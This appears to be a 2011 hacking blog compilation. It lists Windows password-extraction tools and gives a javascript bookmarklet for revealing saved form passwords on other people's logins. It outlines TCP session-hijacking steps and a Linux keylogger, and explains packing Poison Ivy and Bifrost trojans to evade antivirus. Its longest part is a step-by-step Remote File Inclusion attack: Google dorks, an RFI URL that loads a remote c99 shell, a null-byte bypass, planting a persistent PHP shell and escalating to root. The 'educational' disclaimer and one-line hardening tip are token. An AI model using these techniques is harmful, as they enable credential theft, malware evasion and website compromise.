Monday, June 20, 2011

Windows Password Recovery Tools

MessenPass Recovers the passwords of most popular Instant Messenger programs in Windows: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView Recovers the passwords of the following email programs: Windows Live Mail, Windows Mail, Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird,
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassView IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 and 8.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView Recovers all passwords stored inside the Windows Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
Dialupass Password recovery tool that reveals all passwords stored in dial-up entries of Windows. (Internet and VPN connections) This tool works in all versions of Windows, including Windows 2000, Windows XP, Windows Vista, Windows 7, and Windows Server 2003/2008.
BulletsPassView BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords, you can easily copy them to the clipboard or save them into text/html/csv/xml file.
You can use this tool to recover the passwords of many Windows applications, like CuteFTP, Filezilla, VNC, and more…
Network Password Recovery Recover network shares passwords stored by Windows XP, Windows Vista, Windows 7, and Windows Server 2003/2008.
SniffPass Password Sniffer Windows utility which capture the passwords that pass through your network adapter, and display them on the screen instantly.
You can use this utility to recover lost Web/FTP/Email passwords.
RouterPassView Windows utility that can recover lost passwords from configuration file saved by a router. This utility only works if your router save the configuration file in a format that RouterPassView can detect and decript.
PstPassword Recovers lost password of Outlook PST file.
PasswordFox PasswordFox is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
ChromePass ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.
WebBrowserPassView WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 8.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser. After retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the ‘Save Selected Items’ option (Ctrl+S).
PasswordFox PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
WirelessKeyView WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the ‘Wireless Zero Configuration’ service of Windows XP and by the ‘WLAN AutoConfig’ service of Windows 7 and Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.
Remote Desktop PassView Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.
VNCPassView VNCPassView is a small Windows utility that recover the passwords stored by the VNC tool. It can recover 2 of passwords: password stored for the current logged-on user (HKEY_CURRENT_USER in the Registry), and password stored for the all users.
RemotePocketAsterisk Reveals the password stored behind the asterisks in Pocket PC device.

Original Source : www.nirsoft.net

Microsoft Sysinternals Suite

The Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files. It does not contain non-troubleshooting tools like the BSOD Screen Saver or NotMyFault.

The Suite is a bundling of the following selected Sysinternals Utilities:

 

How To View Hidden Password behind ****

After opening the web page paste the javascript given below in the address bar and hit enter

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();




You can use This script when some one has checked the remember me button in the login form of any website and to reveal password from that saved astrisk or encrypted password.

Session Hijacking

Session Hijacking

Session Hijacking is when an attacker gets access to Session Hijacking is when an attacker gets access to the session state of a particular user. The attacker steals a valid session ID which is used to get into the system and snoop the data.
TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.

Types of Session Hijacking


There are two types of session hijacking attacks:

Active: In an active attack, an attacker finds an active session and takes over
Passive: With passive attack, an attacker hijacks a session, but sits back, and watches and records all the     traffic that is being sent forth.

Steps in Session Hijacking
  1. Place yourself between the victim and the target (you must be able to sniff the network)
  2. Monitor the flow of packets
  3. Predict the sequence number
  4. Kill the connection to the victim’s machine
  5. Take over the session
  6. Start injecting packets to the target server.

Tools Description
Juggernaut Juggernaut is a network sniffer that can be used to hijack TCP sessions. It runs on Linux operating systems
Hunt Hunt is a program that can be used to listen, intercept, and hijack active sessions on a network
IP Watcher IP watcher is a commercial session hijacking tool that allows you to monitor connections and has active facilities for taking over a session
Paros HTTP Hijacker Paros is a man-in-the-middle proxy and application vulnerability scanner
T-Sight T-Sight is a session hijacking tool for Windows

Keylogger for Linux

Lots of people actually believe that Trojans are invalid against Linux operating systems. The reality is that Trojan are valid against Linux operating systems, but they infect in a different manner.

Download LKL

LKL is a famous Linux keylogger that runs under Linux on the x86 arch. LKL sniffs and logs everything that passes through the hardware keyboard port (0×60). It translates keycodes to ASCII with a keymap file.




Installation:

The ‘configure’ shell script attempts to guess correct values for various system-dependent variables used during compilation.


It uses those values to create a ‘Makefile’ in each directory of the package. It may also create one or more ‘.h’ files containing system-dependent definitions.

Finally, it creates a shell script ‘config.status’ that you can run in the future to recreate the current configuration, a file ‘config.cache’ that saves the results of its tests to speed up
reconfiguring, and a file ‘config.log’ containing compiler output (useful mainly for debugging ‘configure’).


If you need to do unusual things to compile the package, please try to figure out how ‘configure’ could check whether to do them, and mail diffs or instructions to the address given in the ‘README’ so they can be considered for the next release.

If at some point ‘config.cache’ contains results you don’t want to keep, you may remove or edit it.
The file ‘configure.in’ is used to create ‘configure’ by a program called ‘autoconf’. You only need ‘configure.in’ if you want to change it or regenerate ‘configure’ using a newer version of ‘autoconf’.

The simplest way to compile this package is:

1. ‘cd’ to the directory containing the package’s source code and type ‘./configure’ to configure the package for your system.

If you’re using ‘csh’ on an old version of System V, you might need to type ‘sh ./configure’ instead to prevent ‘csh’ from trying to execute ‘configure’ itself.

Running ‘configure’ takes awhile. While running, it prints some messages telling which features it is checking for.

2. Type ‘make’ to compile the package.

3. Optionally, type ‘make check’ to run any self-tests that come with the package.

4. Type ‘make install’ to install the programs and any data files and documentation.

5. You can remove the program binaries and object files from the source code directory by typing ‘make clean’. To also remove the files that ‘configure’ created (so you can compile the package for a different kind of computer), type ‘make distclean’.

There is also a ‘make maintainer-clean’ target, but that is intended mainly for the package’s developers. If you use it, you may have to get all sorts of other programs in order to regenerate files that came with the distribution.

How to make trojan almost FUD easily



fud 
Nowadays crypting trojan don’t give a good result if you use use a public crypter , otherwise you need to buy a private edition or to hex it .

so here’s a little tip to how make it almost FUD .

We are going to need a ( Privacy Protection Software )

This kind of softwares is used by programs creators to protect their creation from cracking and reverse engineering . We are going to do the same
to a trojan and you are going to see the result.



First of all you need to download the program : Scroll down and you will find the download link
let’s start :

server’s location ->



[Image: 29726338.jpg]

then -> general


[Image: 91158931.jpg]

Security & Encryption


[Image: 50217601.jpg]

Protection Method


[Image: 47781258.jpg]

and we are done !
Fesults :
poison ivy server :


[Image: scnnp.jpg]
bifrost server :


[Image: scanno.jpg]



Saturday, June 18, 2011

Hacking Websites by Remote File Inclusion (RFI)

Today i am going to explain and advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hackingterminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on...

How to hack websites using Remote file inclusion
Remote File Inclusion : Website hacking Method

What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites and more than 60% websites on the internet using PHP are vulnerable to this attack.


Which Websites are Vulnerable to Remote File Inclusion attack?
First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple. 
Many of the web servers are vulnerable to this type of attack because of PHP's default settings of register_globals  and allow_url_fopen being enabled. 
Note: In the PHP 6.0, register_globals has been removed but still the second vulnerability remains open, so we can give it a try to latest version PHP websites too. But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and defacethem. Isn't that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .


Now lets start step by step Remote file inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : CLICK HERE
I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here:


Step 2: Identifying Vulnerable website

Websites that have the page navigation system similar to below mentioned:
http://target-site.com/index.php?page=PageName

Step 3: Checking Website is Vulnerable or Not
To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link  instead of PageName as shown below:
http://target-site.com/index.php?page=http://google.com 

Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn't opens, we will try another website.


Step 4:  Remote Inclusion of Shells
Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily. 
To find the a shell the hacker would search Google for: 
inurl:c99.txt
This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell  so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.

For future use of Analysis you can download these shells from here:

The new URL with the shell included would look like:
 http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.


Step 6:  Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:
  allinurl:.php?page=
This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.

Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 6: If Attack Successful
If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following: 

hacking websites using remote file inclusion, learn how to hack websites
Hacking Website using Shell RFI attack

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.  


Step7: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.

That's all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don't hesitate and ask in form of comments. I will try to clear all your queries.


How to Protect your Websites and Forums from Remote file inclusion attack?
As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Note: Website hacking is illegal, this article is for Educational purposes only.

Thanks for reading.. Enjoy and have Happy Hacking..:)